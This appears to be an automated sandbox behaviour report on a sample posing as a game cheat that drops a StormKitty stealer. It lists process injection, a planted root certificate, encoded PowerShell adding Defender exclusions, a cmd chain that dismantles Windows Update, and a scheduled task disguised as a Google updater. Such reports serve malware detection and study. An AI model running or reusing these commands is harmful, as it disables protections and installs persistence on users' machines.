Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\testy.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2588 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\rustcheat.exe C:\Users\Admin\AppData\Local\Temp\testy.exe
PID 2588 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\rustcheat.exe C:\Users\Admin\AppData\Local\Temp\testy.exe
PID 2588 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\rustcheat.exe C:\Users\Admin\AppData\Local\Temp\testy.exe
PID 2588 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\rustcheat.exe C:\Users\Admin\AppData\Local\Temp\testy.exe
PID 2588 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\rustcheat.exe C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
PID 2588 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\rustcheat.exe C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
PID 2588 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\rustcheat.exe C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
PID 2588 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\rustcheat.exe C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
PID 2232 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\cmd.exe
PID 2232 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\cmd.exe
PID 2232 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\cmd.exe
PID 2232 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\cmd.exe
PID 2232 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\cmd.exe
PID 2232 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\cmd.exe
PID 2132 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 1804 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 1804 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 1804 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2732 wrote to memory of 2720 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 2720 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 2720 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2132 wrote to memory of 2728 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2728 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2728 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2732 wrote to memory of 2784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 2784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 2784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2132 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2132 wrote to memory of 2372 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2372 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2372 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 1632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 1632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 1632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2732 wrote to memory of 2712 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 2712 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 2712 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2132 wrote to memory of 840 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 840 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 840 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2688 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2688 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2688 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2132 wrote to memory of 2596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2732 wrote to memory of 1784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 1784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2732 wrote to memory of 1784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2132 wrote to memory of 1496 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2132 wrote to memory of 1496 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2132 wrote to memory of 1496 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2132 wrote to memory of 2900 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2132 wrote to memory of 2900 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\rustcheat.exe

"C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"

C:\Users\Admin\AppData\Local\Temp\testy.exe

"C:\Users\Admin\AppData\Local\Temp\testy.exe"

C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

"C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe\""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe\""

C:\Windows\system32\schtasks.exe

schtasks /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {34F6453D-8D3B-45D6-AC0B-C71CD6791D8A} S-1-5-21-377084978-2088738870-2818360375-1000:DSWJWADP\Admin:Interactive:[1]

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCE85.tmp.bat

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

C:\Windows\system32\taskkill.exe

TaskKill /F /IM 2632

C:\Windows\system32\timeout.exe

Timeout /T 2 /Nobreak

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe "ofrnufvwokgx"

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAcwBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZgByAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcAB2AGcAIwA+AA=="

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"

C:\Windows\System32\cmd.exe

